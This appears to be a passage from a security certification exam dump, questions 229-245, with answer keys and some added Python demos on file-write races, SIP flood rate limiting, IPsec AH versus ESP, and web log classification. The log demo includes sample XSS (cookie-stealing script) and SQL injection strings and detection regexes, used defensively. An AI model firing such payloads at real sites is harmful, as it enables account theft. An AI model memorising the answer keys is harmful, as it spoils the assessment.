C. Job rotation
D. Separation of duties

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:
Rotating staff between roles and branches limits the long-standing customer relationships that the scenario identifies as the source of the risk, and it is a policy that can be enforced uniformly across all branches.

QUESTION 229
A team is established to create a secure connection between software packages in order to list employees' remaining or unused benefits on their paycheck stubs. Which of the following business roles would be MOST effective on this team?

A. Network Administrator, Database Administrator, Programmers
B. Network Administrator, Emergency Response Team, Human Resources
C. Finance Officer, Human Resources, Security Administrator
D. Database Administrator, Facilities Manager, Physical Security Manager

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 230
After connecting to a secure payment server at https://pay.xyz.com, an auditor notices that the SSL certificate was issued to *.xyz.com. The auditor also notices that many of the internal development servers use the same certificate. After installing the certificate on dev1.xyz.com, one of the developers reports misplacing the USB thumb-drive where the SSL certificate was stored. Which of the following should the auditor recommend FIRST?

A. Generate a new public key on both servers.
B. Replace the SSL certificate on dev1.xyz.com.
C. Generate a new private key password for both servers.
D. Replace the SSL certificate on pay.xyz.com.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
The lost drive held the private key behind the wildcard certificate that every *.xyz.com host shares, so that key must be treated as compromised. The production payment server is the highest-value host using it and should get a new key pair and certificate first (with the old certificate revoked); the development servers follow. Changing a key's passphrase or regenerating only the public key does nothing about a private key that is already in someone else's hands.

QUESTION 231
A data breach has occurred at Company A and as a result, the Chief Information Officer (CIO) has resigned. The CIO's laptop, cell phone and PC were all wiped of data per company policy. A month later, prosecutors in litigation with Company A suspect the CIO knew about the data breach long before it was discovered and have issued a subpoena requesting all the CIO's email from the last 12 months. The corporate retention policy recommends keeping data for no longer than 90 days. Which of the following should occur?

A. Restore the CIO's email from an email server backup and provide the last 90 days from the date of the subpoena request.
B. Inform the litigators that the CIO's information has been deleted as per corporate policy.
C. Restore the CIO's email from an email server backup and provide the last 90 days from the date of the CIO's resignation.
D. Restore the CIO's email from an email server backup and provide whatever is available up to the last 12 months from the subpoena date.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 232
A data processing server uses a Linux based file system to remotely mount physical disks on a shared SAN. The server administrator reports problems related to processing of files where the file appears to be incompletely written to the disk. The data being processed consists of millions of small files being written to disk from a network source one file at a time. These files are then accessed by a local Java program for processing before being transferred over the network to a SELinux host for processing. Other SAN customers are unaffected. The network administration team has conducted a thorough review of all network infrastructure and devices and found everything running at optimal performance. Which of the following is the MOST likely cause of the processing problem?

A. The Java developers accounted for network latency only for the read portion of the processing and not the write process.
B. The virtual file system on the SAN is experiencing a race condition between the reads and writes of network files.
C. The Linux file system in use cannot write files as fast as they can be read by the Java program, resulting in the errors.
D. The administrator has a PERL script running which disrupts the NIC by restarting the CRON process every 65 seconds.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
The network has been ruled out and other SAN customers are unaffected, so the fault is local to this host's file system: the Java reader can open a file before the network writer has finished it and sees a truncated file. That is a read/write race on the shared file system, not a throughput or latency problem.
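The race in question 232 can be shown on any local file system. The following is an added example, not part of the exam or its answer key; the file names, payload and the stop_after interruption are constructed for the demonstration. It contrasts a producer that writes straight into the destination file (a polling reader can see it half-written) with the write-to-temp-then-rename pattern, where the destination name never exists in a partial state.

```python
"""Added example (not part of the exam dump): why a reader on a shared file
system can open a file that the writer has not finished, and the
write-to-temp-then-rename pattern that removes the window. All paths and data
here are constructed for the demonstration."""
import os
import tempfile
from typing import Dict, Optional


def write_in_place(dest: str, data: bytes, chunk: int = 4,
                   stop_after: Optional[int] = None) -> None:
    """Naive producer: opens dest directly, so the file exists and is readable
    while still being filled. stop_after simulates the writer being mid-way
    when a reader polls the directory."""
    with open(dest, "wb") as fh:
        for n, i in enumerate(range(0, len(data), chunk)):
            if stop_after is not None and n >= stop_after:
                return
            fh.write(data[i:i + chunk])


def write_atomic(dest: str, data: bytes, chunk: int = 4,
                 stop_after: Optional[int] = None) -> None:
    """Safe producer: write to a temp file in the same directory, fsync, then
    rename over dest. dest never exists in a partial state: a reader sees
    either no file or the complete one."""
    dirname = os.path.dirname(dest) or "."
    fd, tmp = tempfile.mkstemp(prefix=".partial-", dir=dirname)
    try:
        with os.fdopen(fd, "wb") as fh:
            for n, i in enumerate(range(0, len(data), chunk)):
                if stop_after is not None and n >= stop_after:
                    return  # simulated interruption: dest is never created
                fh.write(data[i:i + chunk])
            fh.flush()
            os.fsync(fh.fileno())
        os.replace(tmp, dest)  # atomic rename within one file system
    finally:
        if os.path.exists(tmp):
            os.unlink(tmp)


def read_if_present(path: str) -> Optional[bytes]:
    """What a polling consumer (the Java program in the question) observes."""
    if not os.path.exists(path):
        return None
    with open(path, "rb") as fh:
        return fh.read()


def demo() -> Dict[str, Optional[bytes]]:
    """Interrupt both producers after two chunks and record what a reader sees,
    then let the atomic producer finish."""
    payload = b"record-1\nrecord-2\nrecord-3\n"
    seen: Dict[str, Optional[bytes]] = {}
    with tempfile.TemporaryDirectory() as d:
        naive = os.path.join(d, "naive.dat")
        atomic = os.path.join(d, "atomic.dat")
        write_in_place(naive, payload, stop_after=2)
        write_atomic(atomic, payload, stop_after=2)
        seen["naive_partial"] = read_if_present(naive)     # truncated file is visible
        seen["atomic_partial"] = read_if_present(atomic)   # nothing visible yet
        write_atomic(atomic, payload)
        seen["atomic_complete"] = read_if_present(atomic)  # complete file only
    return seen


if __name__ == "__main__":
    for name, content in demo().items():
        print(f"{name}: {content!r}")
```

The fix has to live with the producer: a consumer cannot tell a short file from a complete one by looking at it. The rename is only atomic when the temp file and the destination are on the same mounted file system, which is why the temp file is created next to its destination rather than in /tmp.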

QUESTION 233
The VoIP administrator starts receiving reports that users are having problems placing phone calls. The VoIP administrator cannot determine the issue, and asks the security administrator for help. The security administrator reviews the switch interfaces and does not see an excessive amount of network traffic on the voice network. Using a protocol analyzer, the security administrator does see an excessive number of SIP INVITE packets destined for the SIP proxy. Based on the information given, which of the following types of attacks is underway and how can it be remediated?

A. Man in the middle attack; install an IPS in front of the SIP proxy.
B. Man in the middle attack; use 802.1x to secure the voice VLAN.
C. Denial of Service; switch to the more secure H.323 protocol.
D. Denial of Service; use rate limiting to limit traffic.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
A flood of INVITE requests aimed at the SIP proxy exhausts its call-setup capacity, which is a denial of service even though the total bandwidth on the voice VLAN looks normal. Limiting the INVITE rate per source at the proxy or session border controller removes the flood without changing the signalling protocol.
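To make question 233 concrete, the following added example (not part of the exam) replays a constructed SIP capture: one source fires sixty INVITEs in under a second while two phones behave normally. A sliding-window count per source is what a protocol analyzer's conversation view reveals, and a per-source token bucket is the rate limit that option D describes. The addresses, timings and thresholds are all constructed for the demonstration.

```python
"""Added example (not from the exam dump): detect a SIP INVITE flood against a
SIP proxy in captured traffic and apply per-source rate limiting. The capture,
addresses and thresholds are constructed for the demonstration."""
from collections import defaultdict, deque
from typing import Deque, Dict, List, Tuple

# Constructed capture: (timestamp in seconds, source IP, SIP request line).
# One source fires 60 INVITEs in 0.6 s; two legitimate phones send normal traffic.
CAPTURE: List[Tuple[float, str, str]] = (
    [(i * 0.01, "203.0.113.7", "INVITE sip:1000@pbx.example.com SIP/2.0") for i in range(60)]
    + [(0.5, "192.0.2.10", "INVITE sip:1001@pbx.example.com SIP/2.0"),
       (0.9, "192.0.2.10", "ACK sip:1001@pbx.example.com SIP/2.0"),
       (1.2, "192.0.2.11", "REGISTER sip:pbx.example.com SIP/2.0"),
       (1.4, "192.0.2.11", "INVITE sip:1002@pbx.example.com SIP/2.0")]
)


def sip_method(request_line: str) -> str:
    """A SIP request line is 'METHOD Request-URI SIP-Version'."""
    return request_line.split(" ", 1)[0].upper()


def invite_peak_rates(capture, window: float = 1.0) -> Dict[str, int]:
    """Highest number of INVITEs each source sent inside any `window` seconds
    (sliding window, the view a protocol analyzer's conversation list gives)."""
    recent: Dict[str, Deque[float]] = defaultdict(deque)
    peak: Dict[str, int] = defaultdict(int)
    for ts, src, line in sorted(capture):
        if sip_method(line) != "INVITE":
            continue
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        peak[src] = max(peak[src], len(q))
    return dict(peak)


def flood_sources(capture, threshold: int = 10, window: float = 1.0) -> List[str]:
    """Sources whose INVITE rate exceeds what a real phone would generate."""
    return sorted(s for s, n in invite_peak_rates(capture, window).items() if n > threshold)


class InviteRateLimiter:
    """Token bucket per source: `burst` INVITEs pass immediately, then `rate`
    per second; the rest are dropped before they reach the proxy."""

    def __init__(self, rate: float, burst: int) -> None:
        self.rate, self.burst = rate, burst
        self.tokens: Dict[str, float] = {}
        self.last: Dict[str, float] = {}

    def allow(self, ts: float, src: str) -> bool:
        elapsed = ts - self.last.get(src, ts)
        tokens = min(float(self.burst),
                     self.tokens.get(src, float(self.burst)) + elapsed * self.rate)
        self.last[src] = ts
        if tokens >= 1.0:
            self.tokens[src] = tokens - 1.0
            return True
        self.tokens[src] = tokens
        return False


def apply_rate_limit(capture, rate: float = 1.0, burst: int = 5) -> Dict[str, Tuple[int, int]]:
    """Replay the capture through the limiter; returns {source: (accepted, dropped)}."""
    limiter = InviteRateLimiter(rate, burst)
    counts: Dict[str, List[int]] = defaultdict(lambda: [0, 0])
    for ts, src, line in sorted(capture):
        if sip_method(line) != "INVITE":
            continue
        counts[src][0 if limiter.allow(ts, src) else 1] += 1
    return {src: (acc, drop) for src, (acc, drop) in counts.items()}


if __name__ == "__main__":
    print("peak INVITEs per second:", invite_peak_rates(CAPTURE))
    print("flood sources:", flood_sources(CAPTURE))
    print("after rate limiting:", apply_rate_limit(CAPTURE))
```

The limiter is per source on purpose: a global cap would let the attacker starve the legitimate phones, whereas the per-source bucket passes their single INVITE each while dropping 55 of the attacker's 60. Spoofed sources defeat per-IP limiting, so in practice the rate limit sits alongside SIP authentication rather than replacing it.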

QUESTION 234
Staff from the sales department have administrator rights to their corporate standard operating environment, and often connect their work laptop to customer networks when onsite during meetings and presentations. This increases the risk and likelihood of a security incident when the sales staff reconnect to the corporate LAN. Which of the following controls would BEST protect the corporate network?

A. Implement a network access control (NAC) solution that assesses the posture of the laptop before granting network access.
B. Use an independent consulting firm to provide regular network vulnerability assessments and biannual qualitative risk assessments.
C. Provide sales staff with a separate laptop with no administrator access just for sales visits.
D. Update the acceptable use policy and ensure sales staff read and acknowledge the policy.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 235
DRAG DROP
Drag and Drop the following information types on to the appropriate CIA category.

A.
B.
C.
D.

Correct Answer:
Section: (none)
Explanation

Explanation/Reference:

QUESTION 236
A financial company implements end-to-end encryption via SSL in the DMZ, and only IPSec in transport mode with AH enabled and ESP disabled throughout the internal network. The company has hired a security consultant to analyze the network infrastructure and provide a solution for intrusion prevention. Which of the following recommendations should the consultant provide to the security administrator?

A. Switch to TLS in the DMZ. Implement NIPS on the internal network, and HIPS on the DMZ.
B. Switch IPSec to tunnel mode. Implement HIPS on the internal network, and NIPS on the DMZ.
C. Disable AH. Enable ESP on the internal network, and use NIPS on both networks.
D. Enable ESP on the internal network, and place NIPS on both networks.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
AH authenticates the packet but leaves the payload in cleartext, so a network IPS on the internal segment can still inspect the traffic. SSL/TLS in the DMZ encrypts the payload end to end, so a network sensor there sees only ciphertext and inspection has to happen on the hosts (HIPS). Enabling ESP on the internal network would blind the NIPS there as well, which is why options C and D work against the stated goal.
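The property that decides question 236 is whether a passive sensor between the endpoints can read the payload. The following added example (not from the exam, and not real IPsec: there are no SPIs, sequence numbers or standard ciphers) frames the same request two ways, an AH-style integrity tag over a cleartext payload and an ESP-style encrypt-then-tag, and runs a signature check against the bytes on the wire. The key, the toy HMAC-counter keystream and the signature are constructed for the demonstration.

```python
"""Added example (not from the exam dump): why a network IPS can still inspect
traffic protected by IPsec AH but not by ESP. The framing below is a minimal
stand-in for AH and ESP (no SPI, sequence number or real cipher); the key,
keystream construction, signature and packet are constructed for the demo."""
import hashlib
import hmac
import struct

KEY = b"constructed-demo-key"           # shared by both endpoints, not by the sensor
SIGNATURE = b"' OR 1=1"                 # a pattern a NIPS rule might look for
ICV_LEN = 12                            # AH/ESP commonly truncate the HMAC ICV to 96 bits


def ah_protect(payload: bytes) -> bytes:
    """AH-style: integrity tag over the payload; the payload itself stays cleartext."""
    icv = hmac.new(KEY, payload, hashlib.sha256).digest()[:ICV_LEN]
    return struct.pack("!H", len(payload)) + icv + payload


def ah_verify_and_open(frame: bytes) -> bytes:
    """Endpoint check: recompute the ICV and refuse tampered frames."""
    length = struct.unpack("!H", frame[:2])[0]
    icv, payload = frame[2:2 + ICV_LEN], frame[2 + ICV_LEN:2 + ICV_LEN + length]
    expected = hmac.new(KEY, payload, hashlib.sha256).digest()[:ICV_LEN]
    if not hmac.compare_digest(icv, expected):
        raise ValueError("AH integrity check failed")
    return payload


def _keystream(n: int, nonce: bytes) -> bytes:
    """Toy counter-mode keystream derived with HMAC (illustrative only, not AES)."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hmac.new(KEY, nonce + struct.pack("!I", counter), hashlib.sha256).digest()
        counter += 1
    return out[:n]


def esp_protect(payload: bytes, nonce: bytes = b"\x00" * 8) -> bytes:
    """ESP-style: encrypt the payload, then tag nonce + ciphertext."""
    ct = bytes(a ^ b for a, b in zip(payload, _keystream(len(payload), nonce)))
    icv = hmac.new(KEY, nonce + ct, hashlib.sha256).digest()[:ICV_LEN]
    return nonce + ct + icv


def esp_verify_and_open(frame: bytes) -> bytes:
    nonce, ct, icv = frame[:8], frame[8:-ICV_LEN], frame[-ICV_LEN:]
    expected = hmac.new(KEY, nonce + ct, hashlib.sha256).digest()[:ICV_LEN]
    if not hmac.compare_digest(icv, expected):
        raise ValueError("ESP integrity check failed")
    return bytes(a ^ b for a, b in zip(ct, _keystream(len(ct), nonce)))


def nips_sees_signature(frame: bytes) -> bool:
    """A passive sensor in the middle has only the bytes on the wire and no key."""
    return SIGNATURE in frame


if __name__ == "__main__":
    request = b"GET /login?user=admin' OR 1=1-- HTTP/1.1"
    print("AH frame inspectable :", nips_sees_signature(ah_protect(request)))
    print("ESP frame inspectable:", nips_sees_signature(esp_protect(request)))
```

Both framings let the endpoint detect tampering, so AH is not "less secure" for integrity; it simply does not hide the payload. That is the whole reason a NIPS is useful on the AH-only internal network and useless on the TLS-protected DMZ path, where the host must do the inspection.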

QUESTION 237
A University uses a card transaction system that allows students to purchase goods using their student ID. Students can put money on their ID at terminals throughout the campus. The security administrator was notified that computer science students have been using the network to illegally put money on their cards. The administrator would like to attempt to reproduce what the students are doing. Which of the following is the BEST course of action?

A. Notify the transaction system vendor of the security vulnerability that was discovered.
B. Use a protocol analyzer to reverse engineer the transaction system's protocol.
C. Contact the computer science students and threaten disciplinary action if they continue their actions.
D. Install a NIDS in front of all the transaction system terminals.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 238
As part of the ongoing information security plan in a large software development company, the Chief Information Officer (CIO) has decided to review and update the company's privacy policies and procedures to reflect the changing business environment and business requirements. Training and awareness of the new policies and procedures has been incorporated into the security awareness program, which should be:

A. presented by top level management to only data handling staff.
B. customized for the various departments and staff roles.
C. technical in nature to ensure all development staff understand the procedures.
D. used to promote the importance of the security department.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 239
Company XYZ has transferred all of the corporate servers, including web servers, to a cloud hosting provider to reduce costs. All of the servers are running unpatched, outdated versions of Apache. Furthermore, the corporate financial data is also hosted by the cloud services provider, but it is encrypted when not in use. Only the DNS server is configured to audit user and administrator actions, and logging is disabled on the other virtual machines. Given this scenario, which of the following is the MOST significant risk to the system?

A. All servers are unpatched and running old versions.
B. Financial data is processed without being encrypted.
C. Logging is disabled on critical servers.
D. Server services have been virtualized and outsourced.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 240
A business wants to start using social media to promote the corporation and to ensure that customers have a good experience with their products. Which of the following security items should the company have in place before implementation? (Select TWO).

A. The company must dedicate specific staff to act as social media representatives of the company.
B. All staff needs to be instructed in the proper use of social media in the work environment.
C. Senior staff blogs should be ghost written by marketing professionals.
D. The finance department must provide a cost benefit analysis for social media.
E. The security policy needs to be reviewed to ensure that social media policy is properly implemented.
F. The company should ensure that the company has sufficient bandwidth to allow for social media traffic.

Correct Answer: AE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 241
A health service provider is considering the impact of allowing doctors and nurses access to the internal email system from their personal smartphones. The Information Security Officer (ISO) has received a technical document from the security administrator explaining that the current email system is capable of enforcing security policies on personal smartphones, including screen lockout and mandatory PINs. Additionally, the system is able to remotely wipe a phone if reported lost or stolen. Which of the following should the Information Security Officer be MOST concerned with based on this scenario? (Select THREE).

A. Data usage cost could significantly increase.
B. Not all smartphones natively support encryption.
C. Smartphones may be used as rogue access points.
D. The email system may become unavailable due to overload.
E. Compliance may not be supported by all smartphones.
F. Equipment loss, theft, and data leakage.
G. Smartphone radios can interfere with health equipment.

Correct Answer: BCF
Section: (none)
Explanation

Explanation/Reference:

QUESTION 242
A network administrator notices a security intrusion on the web server. Which of the following is indicated by http://test.com/modules.php?op=modload&name=XForum&file=[hostilejavascript]&fid=2 in the log file?

A. Buffer overflow
B. Click jacking
C. SQL injection
D. XSS attack

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:
The `file` parameter carries script content that the application reflects into the page it renders, so the request is a cross-site scripting attempt. A buffer overflow would show an overlong value, a SQL injection would carry quote and keyword sequences, and clickjacking is not visible in a request URL at all.
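The classification in question 242 can be automated over the access log. The following is an added example, not part of the exam: it parses constructed Apache-style log lines (the first reproduces the question's URL with a concrete script payload in place of the `[hostilejavascript]` placeholder), decodes each query parameter, and reports the first attack class that matches. The patterns are deliberately small and illustrative, not a complete WAF rule set.

```python
"""Added example (not from the exam dump): pick the attack class out of web
server log entries like the one in the question. The log lines are
constructed; the patterns are illustrative checks, not a complete WAF rule set."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache-style access log; line 1 reproduces the request in the question,
# line 3 is a SQL injection probe and line 4 is the same XSS payload double-encoded.
LOG = """\
10.0.0.5 - - [10/Oct/2016:13:55:36 +0000] "GET /modules.php?op=modload&name=XForum&file=%3Cscript%3Ealert(document.cookie)%3C/script%3E&fid=2 HTTP/1.1" 200 512
10.0.0.9 - - [10/Oct/2016:13:56:01 +0000] "GET /modules.php?op=modload&name=XForum&file=index&fid=2 HTTP/1.1" 200 4096
10.0.0.7 - - [10/Oct/2016:13:57:12 +0000] "GET /search.php?q=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 2048
10.0.0.7 - - [10/Oct/2016:13:58:40 +0000] "GET /search.php?q=%253Cscript%253Ealert(1)%253C%2Fscript%253E HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\d+)')
XSS_RE = re.compile(r"<\s*script|javascript\s*:|\bon\w+\s*=|<\s*(img|svg|iframe)\b", re.I)
SQLI_RE = re.compile(r"(['\"])\s*(or|and)\s+\S+\s*=|union\s+select|--\s*$|;\s*drop\b", re.I)


def classify_params(params: List[Tuple[str, str]]) -> Optional[Tuple[str, str]]:
    """Return (attack class, parameter name) for the first value matching a rule."""
    for name, value in params:
        # parse_qsl already decoded once; decode again to catch double-encoded payloads
        decoded = unquote_plus(value)
        if XSS_RE.search(decoded):
            return "xss", name
        if SQLI_RE.search(decoded):
            return "sqli", name
    return None


def analyse(log_text: str) -> List[Dict[str, Optional[str]]]:
    """One finding per parsable log line: source, path, attack class, offending parameter."""
    findings: List[Dict[str, Optional[str]]] = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        src, _ts, _method, target, _status, _size = m.groups()
        url = urlsplit(target)
        hit = classify_params(parse_qsl(url.query, keep_blank_values=True))
        findings.append({
            "src": src,
            "path": url.path,
            "attack": hit[0] if hit else None,
            "param": hit[1] if hit else None,
        })
    return findings


if __name__ == "__main__":
    for finding in analyse(LOG):
        print(finding)
```

Decoding the parameter twice is what catches the fourth line; a single decode would pass `%3Cscript%3E` through untouched. The same pattern-matching approach produces false positives on legitimate values (a search for the word "onload=" for instance), which is why a real deployment tunes the rules per parameter rather than applying one global list.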

QUESTION 243
A corporation has Research and Development (R&D) and IT support teams, each requiring separate networks with independent control of their security boundaries to support department objectives. The corporation's Information Security Officer (ISO) is responsible for providing firewall services to both departments, but does not want to increase the hardware footprint within the datacenter. Which of the following should the ISO consider to provide the independent functionality required by each department's IT teams?

A. Put both departments behind the firewall and assign administrative control for each department to the corporate firewall.
B. Provide each department with a virtual firewall and assign appropriate levels of management for the virtual device.
C. Put both departments behind the firewall and incorporate restrictive controls on each department's network.
D. Provide each department with a virtual firewall and assign administrative control to the physical firewall.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:
Virtual firewall instances (contexts) on the existing platform give each department its own rule base and administrative boundary without adding hardware; leaving administrative control on the physical device (option D) would defeat the independence the departments require.

QUESTION 244
A security administrator wants to verify and improve the security of a business process which is tied to proven company workflow. The security administrator was able to improve security by applying controls that were defined by the newly released company security standard. Such controls included code improvement, transport encryption, and interface restrictions. Which of the following can the security administrator do to further increase security after having exhausted all the technical controls dictated by the company's security standard?

A. Conduct a gap analysis and recommend appropriate non-technical mitigating controls, and incorporate the new controls into the standard.
B. Conduct a risk analysis on all current controls, and recommend appropriate mechanisms to increase overall security.
C. Modify the company policy to account for higher security and meet with upper management for approval to implement the new standard.
D. Modify the company standard to account for higher security, adapt the standard accordingly, and implement new technical controls.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
With the standard's technical controls exhausted, the remaining gaps are closed by administrative and procedural controls, and folding them into the standard keeps the process auditable; option D proposes more technical controls, which the question rules out.

QUESTION 245
Which of the following provides the HIGHEST level of security for an integrated network providing services to authenticated corporate users?

A. Point to point VPN tunnels for external users, three-factor authentication, a cold site, physical security guards, cloud based servers, and IPv6 networking.
B. IPv6 networking, port security, full disk encryption, three-factor authentication, cloud based servers, and a cold site.
C. Port security on switches, point to point VPN tunnels for user server connections, two-factor cryptographic authentication, physical locks, and a standby hot site.
D. Port security on all switches, point to point VPN tunnels for user connections to servers, two-factor authentication, a sign-in roster, and a warm site.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference: